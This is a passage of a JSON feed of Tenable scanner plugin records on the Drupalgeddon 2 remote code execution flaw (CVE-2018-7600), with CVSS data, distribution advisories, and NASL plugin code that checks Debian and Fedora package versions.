"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700224.PRM", "href": "https://www.tenable.com/plugins/nnm/700224", "sourceData": "Binary data 700224.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:43:23", "description": "Jasper Mattsson found a remote code execution vulnerability in the Drupal content management system. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nFor further information please refer to the official upstream advisory at https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1325.NASL", "href": "https://www.tenable.com/plugins/nessus/108695", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1325-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108695);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result\nin the site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/drupal7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:29", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.1.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98568", "href": "https://www.tenable.com/plugins/was/98568", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:51", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.2.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98567", "href": "https://www.tenable.com/plugins/was/98567", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:59", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98570", "href": "https://www.tenable.com/plugins/was/98570", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:49", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.0.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98569", "href": "https://www.tenable.com/plugins/was/98569", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:51", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98564", "href": "https://www.tenable.com/plugins/was/98564", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:38", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.6 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98565", "href": "https://www.tenable.com/plugins/was/98565", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:34", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nNote: This has been detected using an active check and should be remediated immediately.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-22T00:00:00", "type": "nessus", "title": "Drupal < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-09-07T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_98216", "href": "https://www.tenable.com/plugins/was/98216", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-07T14:20:41", "description": "The Drupal CMS installed on the remote host is affected by a remote command execution vulnerability. A remote, unauthenticated attacker can leverage this issue to execute arbitrary commands on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "type": "nessus", "title": "Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_CVE-2018-7600_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/109041", "sourceData": "Binary data drupal_CVE-2018-7600_rce.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:16", "description": "- [8.4.6](https://www.drupal.org/project/drupal/releases/8 .4.6)\n\n - [SA-CORE-2018-002 (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002 )\n\n - [8.4.5](https://www.drupal.org/project/drupal/releases/8 .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 / CVE-2017-6930 / CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n - [8.4.4](https://www.drupal.org/project/drupal/releases/8 .4.4)\n\n - [8.4.3](https://www.drupal.org/project/drupal/releases/8 .4.3)\n\n - [8.4.2](https://www.drupal.org/project/drupal/releases/8 .4.2)\n\n - [8.4.1](https://www.drupal.org/project/drupal/releases/8 .4.1)\n\n - [8.4.0](https://www.drupal.org/project/drupal/releases/8 .4.0)\n\n - [8.4.0-rc2](https://www.drupal.org/project/drupal/releas es/8.4.0-rc2)\n\n - [8.4.0-rc1](https://www.drupal.org/project/drupal/releas es/8.4.0-rc1)\n\n - [8.4.0-beta1](https://www.drupal.org/project/drupal/rele ases/8.4.0-beta1)\n\n - [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-906BA26B4D.NASL", "href": "https://www.tenable.com/plugins/nessus/120615", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-906ba26b4d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120615);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2017-6926\",\n \"CVE-2017-6927\",\n \"CVE-2017-6930\",\n \"CVE-2017-6931\",\n \"CVE-2018-7600\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-906ba26b4d\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"-\n [8.4.6](https://www.drupal.org/project/drupal/releases/8\n .4.6)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.4.5](https://www.drupal.org/project/drupal/releases/8\n .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n -\n [8.4.4](https://www.drupal.org/project/drupal/releases/8\n .4.4)\n\n -\n [8.4.3](https://www.drupal.org/project/drupal/releases/8\n .4.3)\n\n -\n [8.4.2](https://www.drupal.org/project/drupal/releases/8\n .4.2)\n\n -\n [8.4.1](https://www.drupal.org/project/drupal/releases/8\n .4.1)\n\n -\n [8.4.0](https://www.drupal.org/project/drupal/releases/8\n .4.0)\n\n -\n [8.4.0-rc2](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc2)\n\n -\n [8.4.0-rc1](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc1)\n\n -\n [8.4.0-beta1](https://www.drupal.org/project/drupal/rele\n ases/8.4.0-beta1)\n\n -\n [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel\n eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-906ba26b4d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal8-8.4.6-3.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n 